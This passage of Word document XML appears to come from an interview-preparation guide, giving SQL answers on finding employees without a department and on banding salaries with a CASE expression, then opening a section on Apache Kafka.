          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">uery </w:t>
      </w:r>
      <w:r w:rsidR="003A4D19" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>- P</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">rint the </w:t>
      </w:r>
      <w:r w:rsidR="00EF4D87" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>employee’s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> name which does not have any department</w:t>
      </w:r>
      <w:r w:rsidR="00564F5D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="756"/>
    </w:p>
    <w:p w14:paraId="0F7BBC1D" w14:textId="473319EC" w:rsidR="00EF4D87" w:rsidRPr="005C1C9E" w:rsidRDefault="00EF4D87" w:rsidP="005C1C9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">To find the employees who do not have any department, you can use a </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LEFT JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to join the Employee table with the Department table. Then, filter the results where the department_id is NULL, indicating the employee is not associated with any department.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EC6D4B"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Here’s the SQL query for that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41299809"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SELECT e.employee_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BA572D"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FROM Employee e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAF453E"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LEFT JOIN Department d ON e.department_id = d.id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35004AF1"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WHERE d.id IS NULL;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6747DD36" w14:textId="77777777" w:rsidR="00EF4D87" w:rsidRPr="005C1C9E" w:rsidRDefault="00EF4D87"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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFE3C67"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LEFT JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This ensures that all employees are included in the result, even if they don't have a matching department.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166028D1"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WHERE d.id IS NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This filters out the employees who do not have a department, as their department_id will be NULL when there is no matching record in the Department table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020A94E6" w14:textId="77777777" w:rsidR="00EF4D87" w:rsidRPr="005C1C9E" w:rsidRDefault="00EF4D87" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This will return the names of employees who are not assigned to any department.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFEC56E" w14:textId="715EE6CD" w:rsidR="00C36198" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00C36198">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="44AB0EAD">
          <v:rect id="_x0000_i3056" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9496EF" w14:textId="695FE663" w:rsidR="00564F5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF4D87">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="757" w:name="_Toc196308237"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>SQL Q</w:t>
      </w:r>
      <w:r w:rsidR="00701CCE" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">uery - Employee table and add one extra column in output as category? Let's say if salary is in 1 to </w:t>
      </w:r>
      <w:r w:rsidR="00701CCE" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:tab/>
        <w:t>4000 then Category 1, 4000 - 7000 then category 2, 7000 - 10000 then category 3</w:t>
      </w:r>
      <w:r w:rsidR="00564F5D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="757"/>
    </w:p>
    <w:p w14:paraId="15F50BC1" w14:textId="1CFD2261" w:rsidR="00310B80" w:rsidRPr="005C1C9E" w:rsidRDefault="00310B80" w:rsidP="005C1C9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To add an extra column called category based on the salary ranges, you can use the CASE statement in SQL. This will allow you to categorize employees based on their salary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D09B37" w14:textId="77777777" w:rsidR="00310B80" w:rsidRPr="005C1C9E" w:rsidRDefault="00310B80" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Here’s the SQL query to achieve this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DF7E5A" w14:textId="77777777" w:rsidR="00310B80" w:rsidRPr="005C1C9E" w:rsidRDefault="00310B80" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SELECT employee_id, employee_name, salary,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FEEF6D" w14:textId="77777777" w:rsidR="00310B80" w:rsidRPr="005C1C9E" w:rsidRDefault="00310B80"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CASE </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5034134C" w14:textId="77777777" w:rsidR="00310B80" w:rsidRPr="005C1C9E" w:rsidRDefault="00310B80"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WHEN salary BETWEEN 1 AND 4000 THEN 'Category 1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D52E56" w14:textId="77777777" w:rsidR="00310B80" w:rsidRPr="005C1C9E" w:rsidRDefault="00310B80"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WHEN salary BETWEEN 4001 AND 7000 THEN 'Category 2'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255F9061" w14:textId="77777777" w:rsidR="00310B80" w:rsidRPr="005C1C9E" w:rsidRDefault="00310B80"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WHEN salary BETWEEN 7001 AND 10000 THEN 'Category 3'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E32ABE2" w14:textId="77777777" w:rsidR="00310B80" w:rsidRPr="005C1C9E" w:rsidRDefault="00310B80"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ELSE 'Other Category' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F8E45A" w14:textId="77777777" w:rsidR="00310B80" w:rsidRPr="005C1C9E" w:rsidRDefault="00310B80" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">       END AS category</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5D3612" w14:textId="77777777" w:rsidR="00310B80" w:rsidRPr="005C1C9E" w:rsidRDefault="00310B80" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FROM Employee;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F04787" w14:textId="77777777" w:rsidR="00310B80" w:rsidRPr="005C1C9E" w:rsidRDefault="00310B80" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF4CA9A" w14:textId="77777777" w:rsidR="00310B80" w:rsidRPr="005C1C9E" w:rsidRDefault="00310B8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CASE</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A conditional statement that allows you to create new categories based on the salary values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730D5780" w14:textId="77777777" w:rsidR="00310B80" w:rsidRPr="005C1C9E" w:rsidRDefault="00310B80" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>BETWEEN</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to specify the range of values for salary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E2B65E" w14:textId="77777777" w:rsidR="00310B80" w:rsidRPr="005C1C9E" w:rsidRDefault="00310B80" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The category will show the respective category based on the salary range.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517B3181" w14:textId="77777777" w:rsidR="00310B80" w:rsidRPr="005C1C9E" w:rsidRDefault="00310B80" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This query will return the employee_id, employee_name, salary, and a new column category based on the defined salary ranges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E97EF4" w14:textId="615D1C11" w:rsidR="00C36198" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00C36198">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="70B81727">
          <v:rect id="_x0000_i3057" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="15ECF8E0" w14:textId="4D78C949" w:rsidR="00517925" w:rsidRPr="00CE4B95" w:rsidRDefault="00517925">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="088E112C" w14:textId="3D0C66EC" w:rsidR="002D75F3" w:rsidRPr="00CE4B95" w:rsidRDefault="002D75F3" w:rsidP="002D75F3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="758" w:name="_Toc196308238"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Kafka</w:t>
      </w:r>
      <w:bookmarkEnd w:id="758"/>
    </w:p>
    <w:p w14:paraId="6A0F9E4E" w14:textId="77777777" w:rsidR="006E0265" w:rsidRPr="00CE4B95" w:rsidRDefault="006E0265" w:rsidP="006E0265">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="118FFA70" w14:textId="5F19F4EB" w:rsidR="002D75F3" w:rsidRPr="00CE4B95" w:rsidRDefault="005B595D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="759" w:name="_Toc196308239"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Apache Kafka</w:t>
      </w:r>
      <w:r w:rsidR="002D75F3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="759"/>
    </w:p>
    <w:p w14:paraId="3A7F9E14" w14:textId="1F9AEB0A" w:rsidR="007E40A9" w:rsidRPr="00CE4B95" w:rsidRDefault="007E40A9" w:rsidP="007E40A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>distributed event streaming platform</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> used for building </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>real-time data pipelines</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>streaming applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It can handle </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of data with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>low latency</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scalable</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durable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fault-tolerant</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> way.</w:t>
      </w:r>
    </w:p>
